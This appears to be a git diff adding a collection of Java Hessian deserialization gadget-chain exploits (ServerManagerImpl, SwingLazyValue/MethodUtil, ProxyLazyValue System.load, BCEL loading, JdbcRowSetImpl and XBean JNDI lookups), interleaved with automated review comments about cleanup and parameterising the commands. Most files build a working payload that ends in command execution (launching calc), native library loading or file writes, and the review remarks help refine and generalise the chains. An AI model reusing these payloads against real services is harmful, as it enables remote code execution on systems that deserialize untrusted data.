+import tools.ReflectTools;
+
+import javax.naming.Context;
+import javax.naming.NamingException;
+import javax.naming.Reference;
+import java.util.HashMap;
+
+public class XBeanGadget {
+ public static void main(String[] args) throws Exception {
+ Object payload = getPayload();
+ byte[] bytes = HessianTools.hessian2Ser2bytes(payload);
+ HessianTools.hessian2Deser(bytes);
+ }
+
+ public static Object getPayload() throws Exception {
+ String refAddr = "http://127.0.0.1:8000/";
+ String refClassName = "Calc";
+
+ Reference ref = new Reference(refClassName, refClassName, refAddr);
+ WritableContext writableContext = new WritableContext();
+
+ // 创建ReadOnlyBinding对象
+ String classname = "org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding";
+ Object readOnlyBinding = Class.forName(classname).getDeclaredConstructor(String.class, Object.class, Context.class).newInstance("aaa", ref, writableContext);
+
+ XString xString = new XString("any");
+
+ HashMap finalMap = ReflectTools.makeEqualMap(xString, readOnlyBinding);
+
+ return finalMap;
+ }
+}
diff --git a/hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java b/hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java
new file mode 100644
index 0000000..6e979b9
--- /dev/null
+++ b/hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java
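Review bot: The chain only fires if the JVM is willing to load the `Calc` factory from `http://127.0.0.1:8000/` when `ReadOnlyBinding.toString()` resolves the `Reference`; remote codebase loading for `Reference` factories has been off by default since 8u191/11.0.1 (`com.sun.jndi.ldap.object.trustURLCodebase`, as I recall), so state the precondition on `getPayload`: `// needs a JDK that still trusts remote codebases for Reference factories, or a factory class already on the target classpath`. `HotSwappableTargetSource` and `NamingException` are imported but unused. The pairing of `new XString("any")` with `readOnlyBinding` presumably relies on `XString.equals` calling `toString()` on the other key, which is why an arbitrary string suffices here while `ResinGadget` needs `unhash`; a one-line comment would save the next reader that trip, and the Chinese `// 创建ReadOnlyBinding对象` should become `// build the ReadOnlyBinding whose toString() resolves the Reference`. `makeEqualMap` is defined outside this hunk, so I cannot confirm how it forces the two keys to collide.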
@@ -0,0 +1,54 @@ +package com.test.gadget.blackhat2025; + +import com.alibaba.fastjson.JSONArray; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; +import com.sun.deploy.nativesandbox.IntegrityProcess; +import javafx.beans.property.IntegerProperty; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.sound.sampled.AudioFileFormat; +import java.util.HashMap; + +public class AudioFileFormat2toString { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Object entry = UnsafeTools.getObjectByUnsafe(ServerTableEntry.class); + // process.exit不能报错;linux下使用UNIXProcess即可 + Object process = UnsafeTools.getObjectByUnsafe(IntegrityProcess.class); + ReflectTools.setFieldValue(entry, "state", 2); + ReflectTools.setFieldValue(entry, "process", process); + ReflectTools.setFieldValue(entry, "activationCmd", "calc"); + + HashMap hashMap = new HashMap<>(); + // 键一定是Integer + hashMap.put(1, entry); + + Object serverManager = UnsafeTools.getObjectByUnsafe(ServerManagerImpl.class); + ReflectTools.setFieldValue(serverManager, "serverTable", hashMap); + + JSONArray jsonArray = new JSONArray(); + jsonArray.add(serverManager); + + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + Object type = UnsafeTools.getObjectByUnsafe(AudioFileFormat.Type.class); + hashMap1.put("1", jsonArray); + hashMap1.put("2", type); + hashMap2.put("1", type); + hashMap2.put("2", jsonArray); + + HashMap finalMap = new HashMap<>(); + finalMap.put(hashMap1, "any"); + finalMap.put(hashMap2, "any"); + + return finalMap; + } +} 
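Review bot: The `ServerTableEntry`/`ServerManagerImpl`/`JSONArray` sink at the top of `getPayload` is repeated line for line in `ConcurrentHashMap2equals` and `XStringFSB2toString`; one shared helper (say `static JSONArray serverManagerSink(String cmd)` in `tools`) would keep the three blackhat2025 variants from drifting and turn the hard-coded `"calc"` into a parameter. `javafx.beans.property.IntegerProperty` is imported but unused, and that single import makes the file fail to compile on JDKs shipped without JavaFX. The comments should be English: `// process.exit() must not throw; on Linux allocate a UNIXProcess instead` and `// serverTable keys must be Integer`. `hashMap1`/`hashMap2` are constructed with swapped values so they are equal-hash but unequal keys of `finalMap`; that invariant is what drives `equals()` and deserves a comment rather than being left implicit.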
diff --git a/hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java b/hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java
new file mode 100644
index 0000000..6a68d8a
--- /dev/null
+++ b/hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java
@@ -0,0 +1,59 @@ +package com.test.gadget.blackhat2025; + +import com.alibaba.fastjson.JSONArray; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; +import com.sun.deploy.nativesandbox.IntegrityProcess; +import com.sun.org.apache.xpath.internal.objects.XStringForFSB; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.sound.sampled.AudioFileFormat; +import java.util.HashMap; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.ConcurrentMap; + +public class ConcurrentHashMap2equals { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Object entry = UnsafeTools.getObjectByUnsafe(ServerTableEntry.class); + // process.exit不能报错;linux下使用UNIXProcess即可 + Object process = UnsafeTools.getObjectByUnsafe(IntegrityProcess.class); + ReflectTools.setFieldValue(entry, "state", 2); + ReflectTools.setFieldValue(entry, "process", process); + ReflectTools.setFieldValue(entry, "activationCmd", "calc"); + + HashMap hashMap = new HashMap<>(); + // 键一定是Integer + hashMap.put(1, entry); + + Object serverManager = UnsafeTools.getObjectByUnsafe(ServerManagerImpl.class); + ReflectTools.setFieldValue(serverManager, "serverTable", hashMap); + + JSONArray jsonArray = new JSONArray(); + jsonArray.add(serverManager); + + Object audio = UnsafeTools.getObjectByUnsafe(AudioFileFormat.Type.class); + +// Object xString = UnsafeTools.getObjectByUnsafe(XStringForFSB.class); +// ReflectTools.setFieldValue(xString, "m_strCache", "notNull1"); + + Class aClass = Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry"); + Object conHashMap1 = UnsafeTools.getObjectByUnsafe(aClass); + Object conHashMap2 = UnsafeTools.getObjectByUnsafe(aClass); + 
ReflectTools.setFieldValue(conHashMap1, "key", audio); + ReflectTools.setFieldValue(conHashMap1, "val", jsonArray); + ReflectTools.setFieldValue(conHashMap2, "key", jsonArray); + ReflectTools.setFieldValue(conHashMap2, "val", audio); + + ConcurrentHashMap finalMap = ReflectTools.makeConcurrentMap(conHashMap1, conHashMap2); + + return finalMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java b/hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java new file mode 100644 index 0000000..a792e77 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java 
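Review bot: `conHashMap1`/`conHashMap2` are `ConcurrentHashMap$MapEntry` instances, not maps, so the names mislead; `mapEntry1`/`mapEntry2` would match what `makeConcurrentMap` actually receives. `XStringForFSB` and `ConcurrentMap` are imported only for the commented-out `xString` lines — drop the dead lines and the imports together. The sink construction duplicates `AudioFileFormat2toString` and `XStringFSB2toString`, and the Chinese comments should be English (`// process.exit() must not throw; on Linux allocate a UNIXProcess instead`, `// serverTable keys must be Integer`). `makeConcurrentMap` lives outside this hunk, so I cannot confirm how the two entries are made to collide; a comment on the call naming the mechanism would help.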
@@ -0,0 +1,92 @@ +package com.test.gadget.blackhat2025; + +import com.alibaba.fastjson.JSONArray; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; +import com.sun.deploy.nativesandbox.IntegrityProcess; +import com.sun.org.apache.xpath.internal.objects.XStringForFSB; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import java.util.AbstractMap; +import java.util.HashMap; + +public class XStringFSB2toString { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Object entry = UnsafeTools.getObjectByUnsafe(ServerTableEntry.class); + // process.exit不能报错;linux下使用UNIXProcess即可 + Object process = UnsafeTools.getObjectByUnsafe(IntegrityProcess.class); + ReflectTools.setFieldValue(entry, "state", 2); + ReflectTools.setFieldValue(entry, "process", process); + ReflectTools.setFieldValue(entry, "activationCmd", "calc"); + + HashMap hashMap = new HashMap<>(); + // 键一定是Integer + hashMap.put(1, entry); + + Object serverManager = UnsafeTools.getObjectByUnsafe(ServerManagerImpl.class); + ReflectTools.setFieldValue(serverManager, "serverTable", hashMap); + + JSONArray jsonArray = new JSONArray(); + jsonArray.add(serverManager); + + Object xString = UnsafeTools.getObjectByUnsafe(XStringForFSB.class); +// String unhash = unhash(jsonArray.hashCode()); + ReflectTools.setFieldValue(xString, "m_strCache", "notNull1"); + + // 不知道为什么要包一层 +// Object simple = UnsafeTools.getObjectByUnsafe(AbstractMap.SimpleEntry.class); + // 这里的key 是 final private,但是竟然能直接赋值成功 +// ReflectTools.setFieldValue(simple, "key", jsonArray); + + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + // 键值不能改,确保hashCode碰撞,才能进入equals + hashMap1.put("zZ", xString); + hashMap1.put("yy", jsonArray); + 
hashMap2.put("yy", xString); + hashMap2.put("zZ", jsonArray); + + HashMap finalMap = ReflectTools.makeMap(hashMap1, hashMap2); + + return finalMap; + } + + public static String unhash ( int hash ) { + int target = hash; + StringBuilder answer = new StringBuilder(); + if ( target < 0 ) { + // String with hash of Integer.MIN_VALUE, 0x80000000 + answer.append("\u0915\u0009\u001e\u000c\u0002"); + + if ( target == Integer.MIN_VALUE ) + return answer.toString(); + // Find target without sign bit set + target = target & Integer.MAX_VALUE; + } + + unhash0(answer, target); + return answer.toString(); + } + private static void unhash0 ( StringBuilder partial, int target ) { + int div = target / 31; + int rem = target % 31; + + if ( div <= Character.MAX_VALUE ) { + if ( div != 0 ) + partial.append((char) div); + partial.append((char) rem); + } + else { + unhash0(partial, div); + partial.append((char) rem); + } + } +} diff --git a/hessian/src/main/java/com/test/gadget/tmp.java b/hessian/src/main/java/com/test/gadget/tmp.java new file mode 100644 index 0000000..d37b3af --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/tmp.java 
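Review bot: `unhash`/`unhash0` are generic hash-preimage helpers (the ysoserial `HashCollisions` routine, by the look of it) but live in a gadget class and are static-imported by `ResinGadget`; move them to `tools` (e.g. `tools.HashTools.unhash`) so gadget files stop depending on each other. The `"zZ"`/`"yy"` keys carry an invariant that should be spelled out in English: `// "zZ".hashCode() == "yy".hashCode() == 3872; keep both so the two inner maps collide and reach equals()`. The commented-out `AbstractMap.SimpleEntry` block and the `// 不知道为什么要包一层` note record an unresolved question; either finish the investigation and document the answer, or delete the dead lines together with the `AbstractMap` import. `m_strCache = "notNull1"` is set without explanation; if it exists to make `XStringForFSB.str()` return a cached value instead of touching the uninitialised FSB fields (my guess), say so.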
@@ -0,0 +1,156 @@ +package com.test.gadget; + +import com.alibaba.fastjson.JSONObject; +import com.caucho.hessian.io.Hessian2Input; +import com.caucho.hessian.io.Hessian2Output; +import com.caucho.hessian.io.SerializerFactory; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; + +import com.sun.org.apache.xpath.internal.objects.XStringForFSB; +import sun.reflect.ReflectionFactory; + +import java.io.*; +import java.lang.reflect.*; +import java.util.HashMap; +import java.util.Random; +import java.util.concurrent.ConcurrentHashMap; + +import static com.sun.org.apache.xalan.internal.xsltc.compiler.Constants.CHARACTERS; + +public class tmp { + public static void main(String[] args) throws Exception { + ServerManagerImpl serverManager = createWithObjectNoArgsConstructor(ServerManagerImpl.class); + HashMap map =new HashMap<>(); + ServerTableEntry serverTableEntry = createWithObjectNoArgsConstructor(ServerTableEntry.class); + map.put(1,serverTableEntry); + + Process process = new ProcessBuilder("cmd", "/c", "calc").start(); + + setFieldValue(serverManager, "serverTable", map); + setFieldValue(serverTableEntry,"state",2); + setFieldValue(serverTableEntry, "process", process); + setFieldValue(serverTableEntry, "activationCmd", "calc"); + + JSONObject jsonObject = new JSONObject(); + jsonObject.put("key", serverManager); + + +// XStringForFSB xStringForFSB = createWithoutConstructor(XStringForFSB.class); +// setFieldValue(xStringForFSB, "m_strCache", generateRandomString()); + Object conEntry = createWithObjectNoArgsConstructor(Class.forName("javax.sound.sampled.AudioFileFormat$Type")); + + + Object conEntry1 = createWithObjectNoArgsConstructor(Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry")); + Object conEntry2 = createWithObjectNoArgsConstructor(Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry")); + setFieldValue(conEntry1, "key", conEntry); + setFieldValue(conEntry1, "val", 
jsonObject); + setFieldValue(conEntry2, "key", jsonObject); + setFieldValue(conEntry2, "val", conEntry); + ConcurrentHashMap s = new ConcurrentHashMap(); + setFieldValue(s, "sizeCtl", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + setAccessible(nodeCons); + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, conEntry1, conEntry1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, conEntry2, conEntry2, null)); + setFieldValue(s, "table", tbl); + Field table = ConcurrentHashMap.class.getDeclaredField("table"); + table.setAccessible(true); + table.set(s, tbl); + + ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); + Hessian2Output out = new Hessian2Output(byteArrayOutputStream); + + SerializerFactory sf = new SerializerFactory(); + sf.setAllowNonSerializable(true); + out.setSerializerFactory(sf); + out.writeObject(s); + out.flush(); + ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray()); + new Hessian2Input(byteArrayInputStream).readObject(); + } + + public static void Serialize(Object obj) throws IOException { + ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin")); + objectOutputStream.writeObject(obj); + + } + + public static Object Unserialize(String Filename) throws IOException,ClassNotFoundException{ + + ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename)); + Object obj = objectInputStream.readObject(); + return obj; + + } + public static String generateRandomString() { + Random random = new Random(); + int length = random.nextInt(20)+1; + StringBuilder sb = new StringBuilder(length); + + for (int i = 0; 
i < length; i++) { + int index = random.nextInt(CHARACTERS.length()); + char randomChar = CHARACTERS.charAt(index); + sb.append(randomChar); + } + + return sb.toString(); + } + public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + field.set(obj, value); + } + public static T createWithoutConstructor ( Class classToInstantiate ) + throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); + } + public static T createWithObjectNoArgsConstructor(Class clzToInstantiate) { + + T resObject = null; + try{ + resObject = createWithConstructor(clzToInstantiate, Object.class, new Class[0], new Object[0]); + } catch (NoSuchMethodException | InstantiationException | IllegalAccessException | InvocationTargetException e) { + } + + return resObject; + } + public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs ) + throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); + setAccessible(objCons); + Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); + setAccessible(sc); + return (T)sc.newInstance(consArgs); + } + public static Field getField(final Class clazz, final String fieldName) { + Field field = null; + try { + field = clazz.getDeclaredField(fieldName); + setAccessible(field); + } + catch (NoSuchFieldException ex) { + if (clazz.getSuperclass() != null) + field = getField(clazz.getSuperclass(), fieldName); + } + return field; + } + public static void setAccessible(AccessibleObject member) { + String versionStr = System.getProperty("java.version"); + int 
javaVersion = Integer.parseInt(versionStr.split("\\.")[0]); + + // not possible to quiet runtime warnings anymore... + // see https://bugs.openjdk.java.net/browse/JDK-8210522 + // to understand impact on Permit (i.e. it does not work + // anymore with Java >= 12) + member.setAccessible(true); + } +} + diff --git a/hessian/src/main/java/com/test/gadget/tmp1.java b/hessian/src/main/java/com/test/gadget/tmp1.java new file mode 100644 index 0000000..a905790 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/tmp1.java @@ -0,0 +1,27 @@ +package com.test.gadget; + +import com.sun.rowset.JdbcRowSetImpl; +import com.sun.syndication.feed.impl.EqualsBean; +import tools.ReflectTools; + +import java.util.HashMap; + +public class tmp1 { + public static void main(String[] args) throws Exception { + JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); + jdbcRowSet.setDataSourceName("ldap://127.0.0.1:50389/2d4ade"); + EqualsBean equalsBean = new EqualsBean(JdbcRowSetImpl.class, jdbcRowSet); + + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + hashMap1.put("zZ", equalsBean); + hashMap1.put("yy", jdbcRowSet); + hashMap2.put("zZ", jdbcRowSet); + hashMap2.put("yy", equalsBean); + + HashMap finalMap = ReflectTools.makeMap(hashMap2, hashMap1); + + byte[] bytes = ReflectTools.ser2bytes(finalMap); + ReflectTools.deser(bytes, null); + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java b/hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java new file mode 100644 index 0000000..ad4a5a8 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java @@ -0,0 +1,10 @@ +package com.test.gadget.toStringBased; + +import java.io.IOException; + +public class BCELClass { + public static void _main(String[] args) throws IOException { + System.out.println("evil _main"); + Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", "calc"}); + } +} 
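Review bot: `Process process = new ProcessBuilder("cmd", "/c", "calc").start();` launches the calculator while the payload is being built, so a "successful" run of `main` proves nothing about the deserialization path; the sibling payloads allocate an uninitialised `IntegrityProcess` through Unsafe instead, and `createWithObjectNoArgsConstructor(IntegrityProcess.class)` would do the same here. `createWithObjectNoArgsConstructor` swallows every reflection exception and returns `null`, which resurfaces later as an NPE in `setFieldValue` with no hint of which allocation failed — at least rethrow as unchecked. `setAccessible` parses `javaVersion` and never uses it, `table` is written into `s` twice (via `setFieldValue` and again through the `Field`), and `Serialize` never closes its `ObjectOutputStream`. The file name `tmp` and the unused `generateRandomString`/`Unserialize` helpers suggest scratch code that should not ship in the commit.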
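Review bot: `tmp1` serializes with `ReflectTools.ser2bytes`/`deser` — Java native serialization rather than Hessian — yet sits in the `hessian` gadget package next to Hessian payloads; either move it or open the class with `// ObjectInputStream variant of the ROME/JdbcRowSetImpl chain, for comparison with RomeBased.rome2Jndi`. `deser(bytes, null)` is defined outside this hunk, so I cannot tell what the second argument does when null (a filter?); a comment on the call would clarify. The `"zZ"`/`"yy"` collision keys are undocumented here as in `XStringFSB2toString`, and the LDAP URL is hard-coded as elsewhere.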
diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java b/hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java new file mode 100644 index 0000000..17436b0 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java @@ -0,0 +1,37 @@ +package com.test.gadget.toStringBased; + +import sun.swing.SwingLazyValue; +import tools.HessianTools; +import tools.ReflectTools; + +import javax.swing.*; +import java.lang.reflect.Method; +import java.rmi.server.UID; +import java.util.HashMap; + +public class HashTableEquals_get { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Method exec = Runtime.class.getDeclaredMethod("exec", String[].class); + Method invokeMethod = Class.forName("sun.reflect.misc.MethodUtil").getDeclaredMethod("invoke", Method.class, Object.class, Object[].class); + // 不能直接传入Runtime,会找不到方法,因为要求参数类型为Object + // hessian>=60最终不能调Runtime,因为反序列化后Runtime变成HashMap了 + SwingLazyValue swingLazyValue = new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke", + new Object[]{invokeMethod, new Object(), new Object[]{exec, Runtime.getRuntime(), new Object[]{new String[]{"cmd.exe","/c","calc"}}}}); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", swingLazyValue); + + UIDefaults uiDefaults1 = new UIDefaults(); + uiDefaults1.put("1diot9", swingLazyValue); + + HashMap hashMap = ReflectTools.makeMap(uiDefaults, uiDefaults1); + + return hashMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java new file mode 100644 index 0000000..0702e2d --- /dev/null 
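Review bot: The comment `hessian>=60最终不能调Runtime,因为反序列化后Runtime变成HashMap了` records a real version boundary but in Chinese and with a truncated version number; in English and pinned it should read `// Hessian >= 4.0.60 (presumably) reads the non-serializable Runtime back as a HashMap, so exec is unreachable — invoke via MethodUtil on a static target instead`, with the exact version checked against the pom. `java.rmi.server.UID` is imported but unused. The `exec`/`invokeMethod`/`SwingLazyValue` construction is copied verbatim into `MimeTypeParameterList_MethodUtil`; a shared `execLazyValue(String... cmd)` helper would remove the duplicate and the hard-coded `cmd.exe /c calc`. `sun.swing.SwingLazyValue` is JDK-internal, so on 9+ this needs `--add-exports java.desktop/sun.swing=ALL-UNNAMED` to compile, if I read the package right; worth a class comment.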
+++ b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java @@ -0,0 +1,36 @@ +package com.test.gadget.toStringBased; + +import sun.swing.SwingLazyValue; +import tools.HessianTools; +import tools.ReflectTools; + +import javax.activation.MimeTypeParameterList; +import javax.swing.*; +import java.io.IOException; +import java.lang.reflect.Method; + +public class MimeTypeParameterList_MethodUtil { + public static void main(String[] args) throws NoSuchMethodException, IllegalAccessException, IOException, ClassNotFoundException { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2ToStringSer(payload); + HessianTools.hessian2Deser(bytes); + } + + + public static Object getPayload() throws NoSuchMethodException, IllegalAccessException, ClassNotFoundException { + Method exec = Runtime.class.getDeclaredMethod("exec", String[].class); + Method invokeMethod = Class.forName("sun.reflect.misc.MethodUtil").getDeclaredMethod("invoke", Method.class, Object.class, Object[].class); + // 不能直接传入Runtime,会找不到方法,因为要求参数类型为Object + // hessian>=60最终不能调Runtime,因为反序列化后Runtime变成HashMap了 + SwingLazyValue swingLazyValue = new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke", + new Object[]{invokeMethod, new Object(), new Object[]{exec, Runtime.getRuntime(), new Object[]{new String[]{"cmd.exe","/c","calc"}}}}); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", swingLazyValue); + + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + ReflectTools.setFieldValue(mimeTypeParameterList, "parameters", uiDefaults); + + return mimeTypeParameterList; + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java new file mode 100644 index 0000000..16be253 --- /dev/null 
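Review bot: `javax.activation.MimeTypeParameterList` was removed from the JDK in 11 (JEP 320, as I recall), so this payload needs the `javax.activation` artifact on the target classpath as well as the attacker's; put that target-side requirement in a class comment alongside the `sun.swing.SwingLazyValue` dependency. `main` could simply `throws Exception` like the other gadget classes instead of listing four checked types, and the `IOException` import exists only for that list. `getPayload` duplicates the `exec`/`invokeMethod`/`SwingLazyValue` setup from `HashTableEquals_get` — extract it once. The Chinese comments should be English: `// Runtime cannot be passed directly: MethodUtil.invoke's target parameter is Object` plus the Hessian version note from the sibling file.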
+++ b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java 
@@ -0,0 +1,57 @@ +package com.test.gadget.toStringBased; + +import jdk.nashorn.internal.runtime.ScriptEnvironment; +import jdk.nashorn.internal.runtime.logging.DebugLogger; +import tools.HessianTools; +import tools.IOTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.activation.MimeTypeParameterList; +import javax.swing.*; + +public class MimeTypeParameterList_ProxyLazyValue_Sysload { + public static void main(String[] args) throws Exception { +// Object payload = writeFilePayload(); +// byte[] bytes = HessianTools.hessian2ToStringSer(payload); +// HessianTools.hessian2Deser(bytes); + + Object o = sysLoadPayload(); + byte[] bytes1 = HessianTools.hessian2ToStringSer(o); + HessianTools.hessian2Deser(bytes1); + } + + public static Object writeFilePayload() throws Exception { + Object scriptenv = UnsafeTools.getObjectByUnsafe(ScriptEnvironment.class); + ReflectTools.setFieldValue(scriptenv, "_print_code", false); + ReflectTools.setFieldValue(scriptenv, "_dest_dir", "D:/"); + + Object debug = UnsafeTools.getObjectByUnsafe(DebugLogger.class); + byte[] bytes = IOTools.readFile("D:/1tmp/gcc/dynamic.dll"); + + UIDefaults.ProxyLazyValue proxyLazyValue = new UIDefaults.ProxyLazyValue("jdk.nashorn.internal.codegen.DumpBytecode", "dumpBytecode", new Object[]{scriptenv, debug, bytes, "test"}); + ReflectTools.setFieldValue(proxyLazyValue, "acc", null); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", proxyLazyValue); + + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + ReflectTools.setFieldValue(mimeTypeParameterList, "parameters", uiDefaults); + + return mimeTypeParameterList; + } + + public static Object sysLoadPayload() throws Exception { + + UIDefaults.ProxyLazyValue proxyLazyValue = new UIDefaults.ProxyLazyValue("java.lang.System", "load", new Object[]{"D:/test.class"}); + ReflectTools.setFieldValue(proxyLazyValue, "acc", null); + + UIDefaults uiDefaults = new UIDefaults(); + 
uiDefaults.put("1diot9", proxyLazyValue); + + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + ReflectTools.setFieldValue(mimeTypeParameterList, "parameters", uiDefaults); + + return mimeTypeParameterList; + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java b/hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java new file mode 100644 index 0000000..726abfd --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java @@ -0,0 +1,38 @@ +package com.test.gadget.toStringBased; + +import com.sun.org.apache.bcel.internal.Repository; +import com.sun.org.apache.bcel.internal.classfile.JavaClass; +import com.sun.org.apache.bcel.internal.classfile.Utility; +import com.sun.org.apache.bcel.internal.util.ClassPath; +import sun.security.pkcs.PKCS9Attribute; +import sun.security.pkcs.PKCS9Attributes; +import sun.swing.SwingLazyValue; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.swing.*; +import java.io.IOException; + +public class PKCS9_BCEL { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2ToStringSer(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + JavaClass javaClass = Repository.lookupClass(BCELClass.class); + String bcel = "$$BCEL$$" + Utility.encode(javaClass.getBytes(), true); + + SwingLazyValue swingLazyValue = new SwingLazyValue("com.sun.org.apache.bcel.internal.util.JavaWrapper", "_main", new Object[]{new String[]{bcel}}); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put(PKCS9Attribute.EMAIL_ADDRESS_OID, swingLazyValue); + + Object PKCS9s = UnsafeTools.getObjectByUnsafe(PKCS9Attributes.class); + ReflectTools.setFieldValue(PKCS9s, "attributes", uiDefaults); + + return PKCS9s; + } +} 
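Review bot: sysLoadPayload hands `System.load` the literal path `D:/test.class`, but System.load takes an absolute path to a native library, and the only library this file handles is the `dynamic.dll` whose bytes writeFilePayload routes through DumpBytecode — the two halves of the sample do not line up, so the path should be a parameter rather than a literal, e.g. `public static Object sysLoadPayload(String libraryPath) throws Exception` with `new Object[]{libraryPath}`. The three commented-out lines at the top of main are dead code; writeFilePayload stays reachable by name, and the dead block only obscures which variant the sample runs. The `D:/` and `D:/1tmp/gcc/dynamic.dll` literals in writeFilePayload have the same portability problem and would fit the same parameter treatment.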
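Review bot: `ClassPath` and `IOException` are imported but never used in PKCS9_BCEL, and `BCELClass` is referenced without appearing in this patch, so the hunk compiles only if that class lives elsewhere in the module — a one-line comment naming it, e.g. `// BCELClass: sibling class whose bytecode is what JavaWrapper._main receives`, would spare the next reader the search. Drop the two imports, and rename `Object PKCS9s` to `pkcs9s` to match the lowerCamelCase used everywhere else in the file. Why `PKCS9Attribute.EMAIL_ADDRESS_OID` is the chosen UIDefaults key is not stated anywhere; it is the only thing tying the map to the sink and deserves a comment on the `put` line.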
diff --git a/hessian/src/main/java/com/test/pojo/Person.java b/hessian/src/main/java/com/test/pojo/Person.java
new file mode 100644
index 0000000..1f1a6e8
--- /dev/null
